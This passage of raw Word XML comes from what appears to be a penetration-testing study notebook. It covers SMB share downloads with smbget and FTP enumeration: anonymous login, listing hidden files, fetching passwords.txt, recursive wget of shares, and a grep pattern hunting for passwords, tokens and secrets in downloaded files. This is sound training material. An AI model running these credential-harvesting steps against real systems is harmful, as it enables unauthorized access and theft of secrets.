      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbget -R -U username smb://MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001377">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this if you want to download as a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001378">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run this command while IN your local machine, not while inside smb client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And once this runs, there should be new files/folders on your machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Types:</w:t>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t xml:space="preserve">D: Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Represents a folder that contains files or other subdirectories.</w:t>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t xml:space="preserve">DR: Directory (Readable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001381">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicates a directory with readable permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001382">
      <w:pPr>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t xml:space="preserve">DH: Directory (Hidden)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001384">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden directory. These are often configuration or temporary directories.</w:t>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t xml:space="preserve">HR: Hidden File (Readable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001387">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden file with read permissions. Hidden files often start with a dot (.) and are used for system or application settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001388">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001389">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R: Regular File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A standard file, which could contain text, logs, or binary data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013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8E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y3fhc19e4hng" w:id="166"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tips:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001391">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous as both the passwords and username sometimes works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001392">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see anything related to Ruby or "Ruby on Rails" when you look at FTP, look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId375">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</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393">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001394">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAUTION:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The FTP server may become unresponsive for up to 50 seconds after a port scan. Be patient and wait before attempting to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001395">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001396">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to connect to ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001397">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001398">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will be prompted for username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001399">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp [username]@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to list files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I really recommend using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since there may be hidden files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get files from ftp (it will download to the current working directory):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">get passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download all files from the current directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd &lt;directory_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, FTP prompts you to confirm each file download when using mget. To avoid this and download all files without confirmation, disable prompting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mget *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (make sure you type in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prompt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">before hand)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the mget command with a wildcard (*) to download all files in the current directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download all files recursively using wget (so no need to use ftp fool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -r ftp://USER:PASS@IP:PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be cognizant of fact that this will only get files we have Read access to, so it is important to manually login and explore the files for items that were missed. This may end up being a secondary enumeration pass, if we hit a wall — just don't forget it. I have found useful usernames in UAC files that I could not retrieve. It is also important to login to test file upload functionality.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command is really useful for looking through something like a directory of FTP or SMB files for useful information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId376">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3B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r : Recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i : Ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n : Line numbers: Shows the line number in the file where the match occurs.</w:t>
      </w:r>
    </w:p>
